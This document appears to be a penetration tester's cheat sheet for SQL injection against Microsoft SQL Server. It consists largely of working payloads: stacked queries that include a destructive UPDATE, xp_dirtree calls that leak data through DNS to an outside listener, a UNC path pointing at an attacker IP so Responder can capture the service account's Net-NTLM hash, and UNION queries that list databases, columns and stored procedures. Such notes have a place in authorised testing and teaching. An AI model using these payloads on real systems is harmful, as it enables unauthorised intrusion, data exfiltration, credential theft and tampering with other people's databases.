MSSQL Injection
Not DB Administrator (payloads usable from a low-privileged login; xp_dirtree is typically executable by the public role, so the sysadmin role is not required for the out-of-band techniques below)
Issues
Collation conflicts: a UNION between columns with different collations (e.g. Latin1_General_CI_AS vs SQL_Latin1_General_CP1_CI_AS) fails with "Cannot resolve the collation conflict". Cast the injected column to binary so no collation applies (the result comes back hex-encoded):
convert(varbinary,<column_name>)
Stacked queries (MSSQL executes ';'-separated batches, so a second statement can be appended to the injected one; the WAITFOR delay confirms blind execution, and the UPDATE shows writes are possible — it is destructive, so restrict it to in-scope test rows)
a'; WAITFOR DELAY '00:00:10' --
a'; UPDATE <table> SET <column_name> = '<value>' WHERE id=<id>; --
tip
The share name must be specified even if it does not exist: xp_dirtree only issues the outbound lookup/connection when given a full UNC path of the form \\host\share.
Out-of-band DNS listeners you control, e.g.:
http://requestbin.net/dns
Burp Collaborator
a';declare @q varchar(99);set @q='\\<test>.<XXX.d.requestbin.net>\<share>'; exec master.dbo.xp_dirtree @q;-- -
tip
If the DNS callback works and outbound SMB (TCP 445) from the database host is not blocked by egress filtering, SQL Server authenticates to the attacker host when opening the UNC path; listen with Responder to capture the Net-NTLM hash. Note the hash belongs to the account the SQL Server service runs as, not to the database login used by the injection.
a';declare @q varchar(99);set @q='\\<ip>\<anything>'; exec master.dbo.xp_dirtree @q;-- -
List databases (master..sysdatabases is the legacy compatibility view; sys.databases is the current catalog view. The getdate() and convert(varbinary, ...) placeholders keep the UNION column types compatible with the original query)
a' union select 1,2,3,getdate(),5,6,convert(varbinary,name),8 FROM master..sysdatabases -- -
List all columns of tables whose name matches a LIKE pattern (use % wildcards, e.g. '%user%')
a' union select 1,2,3,getdate(),5,6,table_name,column_name FROM information_schema.columns where table_name like '<user>' -- -
List stored procedures (this filters on the 'sp' name prefix, so it also matches non-procedure objects and misses procedures with other names; for an exact type match filter on xtype = 'P' or query sys.procedures)
a' union select 1,2,3,getdate(),5,6,convert(varbinary,name),8 FROM master..sysobjects WHERE name like 'sp%' -- -